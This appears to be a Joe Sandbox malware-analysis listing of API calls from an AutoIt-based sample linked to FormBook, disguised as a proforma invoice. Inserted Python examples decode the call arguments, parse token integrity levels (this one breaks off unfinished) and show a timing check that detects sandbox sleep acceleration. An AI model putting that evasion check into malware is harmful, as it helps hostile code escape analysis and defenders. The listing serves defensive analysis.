                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    • Opcode ID: 04ee1d1bf7dc84622f09c442455c059dbc33f460bdbbdb1953c429dd69b02bb2
                                                                                                                    • Instruction ID: bc3d9033c6099ad75aac38131ba8811eab4f901d6fbca0b56dcd2cbb075d0d3b
                                                                                                                    • Opcode Fuzzy Hash: 04ee1d1bf7dc84622f09c442455c059dbc33f460bdbbdb1953c429dd69b02bb2
                                                                                                                    • Instruction Fuzzy Hash: D7418435924106FBCF159F68C848AE9BB74FB05361F20435AF829922D0C7749D68DFA5
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A63E7
                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 002A6433
                                                                                                                    • TranslateMessage.USER32(?), ref: 002A645C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 002A6466
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A6475
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2108273632-0
                                                                                                                    • Opcode ID: 22d097c9eeb8515ccadfbe55584afc430286dbd1a3fb86a570d6a1e71caab7c7
                                                                                                                    • Instruction ID: fc42e6a88de654d5e1721c6605f8a3a97ddefe6850f33bed1ff3a267f9b38d56
                                                                                                                    • Opcode Fuzzy Hash: 22d097c9eeb8515ccadfbe55584afc430286dbd1a3fb86a570d6a1e71caab7c7
                                                                                                                    • Instruction Fuzzy Hash: B331C631920647DFDB75CF70DC4CBF67BACAB0A300F184565E525C21A0EB7598A9D760
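                                                                                                                     The API entries in these blocks print their arguments as raw hexadecimal exactly as the IDA plugin captured them, which hides what the calls actually do. The script below is an added illustration, not part of the Joe Sandbox report or its tooling: it parses lines in that format and decodes the constants that matter when reading them, namely the OpenProcess access mask 0x410 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), the PeekMessageW flag 1 (PM_REMOVE), the GetAsyncKeyState keys 1 and 2 (VK_LBUTTON, VK_RBUTTON), the PostMessageW messages 0x201 and 0x202 (WM_LBUTTONDOWN followed by WM_LBUTTONUP, a synthesized left click) and the GetProcessMemoryInfo cb of 0x28 (40 bytes, the size of PROCESS_MEMORY_COUNTERS in a 32-bit process). The sample input is a handful of lines copied from the listing; the constant tables are a deliberately small subset of the Win32 headers, so any value outside them is left in hex.

```python
"""Decode Win32 constants in Joe Sandbox 'APIs' listing lines (added example)."""
import re

# Constructed sample: API lines copied verbatim from the report's listing.
# "?" marks an argument the plugin could not recover; subcall lines carry no
# argument list and are skipped by the parser.
SAMPLE = """\
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002CEC07
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002CED6A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A63E7
• GetAsyncKeyState.USER32(00000001), ref: 00252399
• PostMessageW.USER32(?,00000201,00000001), ref: 002A8ADA
• PostMessageW.USER32(?,00000202,00000000), ref: 002A8AF0
  • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
"""

API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Small subsets of the Win32 constants; values not listed here stay in hex.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
WINDOW_MESSAGES = {0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
                   0x0204: "WM_RBUTTONDOWN", 0x0205: "WM_RBUTTONUP"}
VIRTUAL_KEYS = {0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON", 0x04: "VK_MBUTTON"}
PEEK_FLAGS = {0x0: "PM_NOREMOVE", 0x1: "PM_REMOVE"}


def decode_flags(value, table):
    """Expand a bitmask into flag names; leftover bits are appended in hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def decode_cb(value):
    # 40 bytes is sizeof(PROCESS_MEMORY_COUNTERS) for a 32-bit process
    return f"cb={value} (32-bit PROCESS_MEMORY_COUNTERS)" if value == 40 else f"cb={value}"


# (API name, zero-based argument index) -> decoder for that argument
DECODERS = {
    ("OpenProcess", 0): lambda v: decode_flags(v, PROCESS_ACCESS),
    ("PostMessageW", 1): lambda v: WINDOW_MESSAGES.get(v, hex(v)),
    ("GetAsyncKeyState", 0): lambda v: VIRTUAL_KEYS.get(v, hex(v)),
    ("PeekMessageW", 4): lambda v: PEEK_FLAGS.get(v, hex(v)),
    ("GetProcessMemoryInfo", 2): decode_cb,
}


def parse_api_line(line):
    """Return {'api','module','args','ref'} for an API line, or None otherwise."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a.strip(), 16)
            for a in m["args"].split(",")]
    return {"api": m["api"], "module": m["module"], "args": args,
            "ref": int(m["ref"], 16)}


def annotate_call(call):
    """Decode each argument of a parsed call; unknown ('?') arguments stay '?'."""
    out = []
    for i, v in enumerate(call["args"]):
        if v is None:
            out.append("?")
            continue
        dec = DECODERS.get((call["api"], i))
        out.append(dec(v) if dec else hex(v))
    return out


def render(call):
    """One readable line: call-site address, API name and decoded arguments."""
    return f"{call['ref']:08X} {call['api']}({', '.join(annotate_call(call))})"


def annotate_listing(text):
    """Parse every API line in a listing and return the rendered lines."""
    calls = (parse_api_line(line) for line in text.splitlines())
    return [render(c) for c in calls if c]


if __name__ == "__main__":
    for line in annotate_listing(SAMPLE):
        print(line)
```

The subcall lines are dropped on purpose: they name a helper and its call site but carry no argument list, so there is nothing to decode. Keep in mind that these blocks come from the submitted executable's own image (base 0x250000), which the report flags as a compiled AutoIt script; message pumps, synthesized clicks and INI access of this kind belong to that runtime, so they should be read alongside the injection and credential-theft signatures in the overview rather than as FormBook-specific behaviour on their own.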
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002A8A30
                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 002A8ADA
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002A8AE2
                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 002A8AF0
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002A8AF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    • Opcode ID: 6f8273668e2ee784724f00081c2b08a600d05848076e40f8feea816af1ad1864
                                                                                                                    • Instruction ID: 3ede11a46112d535a920dc50aa56a59a5aa75e74462d889a6cebd190ad4b6f64
                                                                                                                    • Opcode Fuzzy Hash: 6f8273668e2ee784724f00081c2b08a600d05848076e40f8feea816af1ad1864
                                                                                                                    • Instruction Fuzzy Hash: 9931A07190021AEBDF14CFA8D94DA9E7BB5FB05315F10822AF925E61D1CBB09D24DB90
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 002AB204
                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002AB221
                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002AB259
                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002AB27F
                                                                                                                    • _wcsstr.LIBCMT ref: 002AB289
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902887630-0
                                                                                                                    • Opcode ID: 39d26da514f1d205f22799d5e71332fb5f90e321950516148fb04d9938a94df1
                                                                                                                    • Instruction ID: 05ccec68662ff33bc85792b41529841b8f22aa332dbd8c22ef0b0936e2b06022
                                                                                                                    • Opcode Fuzzy Hash: 39d26da514f1d205f22799d5e71332fb5f90e321950516148fb04d9938a94df1
                                                                                                                    • Instruction Fuzzy Hash: 9F21B631615201BBEB169F759C49B7F7B9CDB4A750F00812AFC09DA192EF71DC60D6A0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002DB192
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002DB1B7
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002DB1CF
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 002DB1F8
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002C0E90,00000000), ref: 002DB216
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2294984445-0
                                                                                                                    • Opcode ID: 0fcf5c3d46d9b4ff1be8659b16f700cf12a60f5f605f6205a488dde3e1d93b3f
                                                                                                                    • Instruction ID: ad69f0d54fb0bd6d763a150f67e7b0c2988ad564d722cb420efdd0fca3d5de13
                                                                                                                    • Opcode Fuzzy Hash: 0fcf5c3d46d9b4ff1be8659b16f700cf12a60f5f605f6205a488dde3e1d93b3f
                                                                                                                    • Instruction Fuzzy Hash: CE216271A20652EFCB129F38DC68A6A37A4FB05361F164726FD36D72E0D7309D209B90
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002A9320
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A9352
                                                                                                                    • __itow.LIBCMT ref: 002A936A
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A9392
                                                                                                                    • __itow.LIBCMT ref: 002A93A3
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2983881199-0
                                                                                                                    • Opcode ID: b6637791ec18808fdce5aa6b05eb50085516140b952e22dfe01977799d3c5c12
                                                                                                                    • Instruction ID: 3f9733b821f29a052147bf45df0efc67ac55b75eeae26520aaef35ff9ba7ea66
                                                                                                                    • Opcode Fuzzy Hash: b6637791ec18808fdce5aa6b05eb50085516140b952e22dfe01977799d3c5c12
                                                                                                                    • Instruction Fuzzy Hash: 75210731B21209ABDF109F659C89EEE3BBCEB4A711F048065FD05D71C0DAB0CDA59B91
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00000000), ref: 002C5A6E
                                                                                                                    • GetForegroundWindow.USER32 ref: 002C5A85
                                                                                                                    • GetDC.USER32(00000000), ref: 002C5AC1
                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 002C5ACD
                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 002C5B08
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4156661090-0
                                                                                                                    • Opcode ID: 0c4faed97b7e95ef5133a19757e7aa6b474f2bd82baf0f2ab3f908b16317d34a
                                                                                                                    • Instruction ID: cf870a9ace924f9e9ce4082f79236a26ce157e3ba6bfc39fe273e7b33993fd4e
                                                                                                                    • Opcode Fuzzy Hash: 0c4faed97b7e95ef5133a19757e7aa6b474f2bd82baf0f2ab3f908b16317d34a
                                                                                                                    • Instruction Fuzzy Hash: 6621A135A11104AFD700EF65DD88A9ABBE9EF48350F14C579F81A97362CA30ED51CF94
                                                                                                                    APIs
                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0025134D
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0025135C
                                                                                                                    • BeginPath.GDI32(?), ref: 00251373
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0025139C
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 6469fd0d8f57a3180a02e2fab9a781ec3562e8b37b69bafd58befbb837a7920b
                                                                                                                    • Instruction ID: 90fb0b73c9d381009e60f0a0e35ad435207a73ec6f47b9a9ae1b1f6f1b53fb56
                                                                                                                    • Opcode Fuzzy Hash: 6469fd0d8f57a3180a02e2fab9a781ec3562e8b37b69bafd58befbb837a7920b
                                                                                                                    • Instruction Fuzzy Hash: 4821A130922619FFDB129F29ED087A93BACFB44322F14C256F811961B0D37098B9CF94
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002B4ABA
                                                                                                                    • __beginthreadex.LIBCMT ref: 002B4AD8
                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 002B4AED
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002B4B03
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002B4B0A
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3824534824-0
                                                                                                                    • Opcode ID: 7b9aed1c6cdfd826a5510a2824f338b8c29d9402c845b827362dc1d0c3d4f665
                                                                                                                    • Instruction ID: c0e6a89fc54d46e03fe7f1d6479d5c6b275fae132fdabe1e841992593731a04a
                                                                                                                    • Opcode Fuzzy Hash: 7b9aed1c6cdfd826a5510a2824f338b8c29d9402c845b827362dc1d0c3d4f665
                                                                                                                    • Instruction Fuzzy Hash: 0F112B76D15245FFC7019FA8EC48ADB7FACEB89360F148266F925D3251D671CD1087A0
                                                                                                                    APIs
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A821E
                                                                                                                    • GetLastError.KERNEL32(?,002A7CE2,?,?,?), ref: 002A8228
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,002A7CE2,?,?,?), ref: 002A8237
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,002A7CE2,?,?,?), ref: 002A823E
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8255
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842720411-0
                                                                                                                    • Opcode ID: 7aa7ac8b66f8c3a9edb1dd99d389a5db21ade5ab5c10447ad4537d82366244f5
                                                                                                                    • Instruction ID: c269113f1b03aec0c7ac286586add24357a19ca331f35d6e3562968d7b55ce13
                                                                                                                    • Opcode Fuzzy Hash: 7aa7ac8b66f8c3a9edb1dd99d389a5db21ade5ab5c10447ad4537d82366244f5
                                                                                                                    • Instruction Fuzzy Hash: 11014B71611245EFDB604FA5ED4CD6B7BACEF8A754B50047AF80AC2220DA31CD10CA60
                                                                                                                    APIs
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?,?,002A7455), ref: 002A7127
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7142
                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7150
                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?), ref: 002A7160
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A716C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: 4b3c95e34ace9dfb473cd90e1e5f700790385a48ac28167775bb210ab3dc1fff
                                                                                                                    • Instruction ID: ed9bafc0bf51e1f72a09033fc978cb7602f5b1dfa3dd1fcee78d7944d2784c7b
                                                                                                                    • Opcode Fuzzy Hash: 4b3c95e34ace9dfb473cd90e1e5f700790385a48ac28167775bb210ab3dc1fff
                                                                                                                    • Instruction Fuzzy Hash: F101DF72A22204BBDB104F64ED48BAABBECEF45791F144065FD49D2220DB31DD109BA4
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5260
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B526E
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5276
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B5280
                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: 65b984e100a4042b22a5615e6065d9444e64639e731d55c81a7ccce5f1b3e8ba
                                                                                                                    • Instruction ID: 179384e9eda0fc4f38e920e67a0e854fc12103b460b1b3388a839a85b19585d3
                                                                                                                    • Opcode Fuzzy Hash: 65b984e100a4042b22a5615e6065d9444e64639e731d55c81a7ccce5f1b3e8ba
                                                                                                                    • Instruction Fuzzy Hash: 8C011B35D12A29DBCF00EFE8ED4D6EDBB78BB09751F400156E946B6140CB70996087A5
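The five calls above have the shape of a timed sleep: read the performance counter, read its frequency, Sleep, read the counter again. The same measurement is what a sleep-acceleration check looks like, because a sandbox that patches Sleep to return early leaves a counter delta shorter than the requested interval. The block below is an added example, not code from the sample or from the Joe Sandbox report; it mirrors the QueryPerformanceCounter/QueryPerformanceFrequency/Sleep arithmetic in Python with an injectable counter and sleep so it runs on any OS. The 50% tolerance, the 10 MHz simulated frequency and the simulated sleep-skipping sandbox are assumptions made for the demonstration.

```python
"""Timing check of the QueryPerformanceCounter / Sleep / QueryPerformanceCounter kind.

Added example: measures whether a Sleep() actually consumed the requested
wall-clock time, which is how a program notices sleep acceleration in an
analysis sandbox. Counter and sleep are injectable so the logic runs anywhere.
"""
import time
from dataclasses import dataclass
from typing import Callable

# Assumed tick frequency for the simulated counter (modern Windows reports
# 10 MHz from QueryPerformanceFrequency; the value is divided out anyway).
SIM_FREQUENCY_HZ = 10_000_000


@dataclass
class TimingResult:
    requested_ms: int
    elapsed_ms: float
    skipped: bool


def measure_sleep(requested_ms: int,
                  counter: Callable[[], int],
                  frequency_hz: int,
                  sleep: Callable[[int], None],
                  tolerance: float = 0.5) -> TimingResult:
    """Mirror the API sequence: counter, frequency, sleep, counter.

    `counter` returns integer ticks (like QueryPerformanceCounter),
    `frequency_hz` is ticks per second (like QueryPerformanceFrequency),
    `sleep` takes milliseconds (like kernel32!Sleep).
    The sleep is flagged as skipped when less than `tolerance` of the
    requested interval elapsed; the tolerance is an assumed value.
    """
    start = counter()
    sleep(requested_ms)
    end = counter()
    elapsed_ms = (end - start) * 1000.0 / frequency_hz
    return TimingResult(requested_ms, elapsed_ms, elapsed_ms < requested_ms * tolerance)


class SimulatedClock:
    """Constructed counter whose time only advances when something sleeps."""

    def __init__(self, frequency_hz: int = SIM_FREQUENCY_HZ):
        self.frequency_hz = frequency_hz
        self.ticks = 0

    def counter(self) -> int:
        return self.ticks

    def honest_sleep(self, ms: int) -> None:
        # A real Sleep: the counter advances by the full interval.
        self.ticks += ms * self.frequency_hz // 1000

    def accelerated_sleep(self, ms: int) -> None:
        # A sandbox that fast-forwards Sleep: the counter only advances 1 ms
        # regardless of the request (constructed behaviour for the demo).
        self.ticks += 1 * self.frequency_hz // 1000


def check_real_clock(requested_ms: int = 20) -> TimingResult:
    """Same measurement against the host's monotonic clock (any OS)."""
    return measure_sleep(
        requested_ms,
        counter=time.perf_counter_ns,
        frequency_hz=1_000_000_000,
        sleep=lambda ms: time.sleep(ms / 1000.0),
    )


def demo_simulated():
    """Run the check once against an honest Sleep and once against a patched one."""
    clk = SimulatedClock()
    honest = measure_sleep(2000, clk.counter, clk.frequency_hz, clk.honest_sleep)
    patched = measure_sleep(2000, clk.counter, clk.frequency_hz, clk.accelerated_sleep)
    return honest, patched


if __name__ == "__main__":
    for r in demo_simulated():
        print(f"requested={r.requested_ms}ms elapsed={r.elapsed_ms:.1f}ms skipped={r.skipped}")
    r = check_real_clock()
    print(f"host clock: requested={r.requested_ms}ms elapsed={r.elapsed_ms:.1f}ms skipped={r.skipped}")
```

The simulated clock is the interesting half: a sandbox that shortens Sleep without also advancing the performance counter produces a delta of 1 ms for a 2000 ms request, which is exactly what a sample can detect. Sandboxes that accelerate both the sleep and the counter coherently do not trip this particular check.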
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8121
                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A812B
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A813A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8141
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8157
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 412f584d9abc9d4c42a49cd4c71fd735b1c7ebbbfbf5406f1b15fff67f6baeb2
                                                                                                                    • Instruction ID: dc0d07206f2134d373485776fa75e33186119c440dad044a4a11d8a2bc04afb2
                                                                                                                    • Opcode Fuzzy Hash: 412f584d9abc9d4c42a49cd4c71fd735b1c7ebbbfbf5406f1b15fff67f6baeb2
                                                                                                                    • Instruction Fuzzy Hash: 95F0AF70611315AFEB510FA4EC8CE673BACFF4A755B000036F98AC2150DE60DD11DA60
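The two GetTokenInformation calls above, separated by GetLastError, GetProcessHeap and HeapAlloc, are the standard two-call pattern: the first call passes a zero-length buffer so that it fails with ERROR_INSUFFICIENT_BUFFER and reports the required size, the caller allocates that many bytes from the process heap, and the second call fills a TOKEN_MANDATORY_LABEL whose SID carries the integrity level as its last sub-authority. The block below is an added example, not code from the sample or from the report. It decodes such a buffer for both the 32-bit layout of this sample and the x64 layout against constructed SIDs, and, on Windows only, performs the same two-call query through ctypes using the documented enumerator value TokenIntegrityLevel = 25. The constructed label buffers (with a zeroed PSID field) and the RID-to-name table are illustrations; the RID values are the winnt.h SECURITY_MANDATORY_*_RID constants.

```python
"""Decode the result of GetTokenInformation(TokenIntegrityLevel).

Added example, not code from the sample. The parser runs anywhere; the
two-call query at the bottom only runs on Windows.
"""
import struct
import sys
from typing import Tuple

ERROR_INSUFFICIENT_BUFFER = 122
TOKEN_QUERY = 0x0008
TOKEN_INTEGRITY_LEVEL = 25          # TOKEN_INFORMATION_CLASS.TokenIntegrityLevel
SE_GROUP_INTEGRITY = 0x20
SE_GROUP_INTEGRITY_ENABLED = 0x40

# winnt.h SECURITY_MANDATORY_*_RID values; the names are for display only.
INTEGRITY_NAMES = {
    0x0000: "Untrusted", 0x1000: "Low", 0x2000: "Medium", 0x2100: "Medium Plus",
    0x3000: "High", 0x4000: "System", 0x5000: "Protected Process",
}


def parse_sid(blob: bytes) -> Tuple[str, int]:
    """Decode a binary SID (Revision, SubAuthorityCount, 48-bit big-endian
    IdentifierAuthority, little-endian sub-authorities) into its S-1-...
    string and its last sub-authority (the RID)."""
    if len(blob) < 8:
        raise ValueError("SID too short")
    revision, count = blob[0], blob[1]
    if revision != 1 or count == 0 or len(blob) < 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs))), subs[-1]


def integrity_level_from_label(buf: bytes, pointer_size: int) -> Tuple[str, str]:
    """Decode a TOKEN_MANDATORY_LABEL as returned by GetTokenInformation.

    The buffer starts with SID_AND_ATTRIBUTES {PSID Sid; DWORD Attributes}
    (8 bytes on x86, 16 on x64 because of alignment) and the SID itself is
    stored right after it, so the absolute PSID pointer is not needed here.
    """
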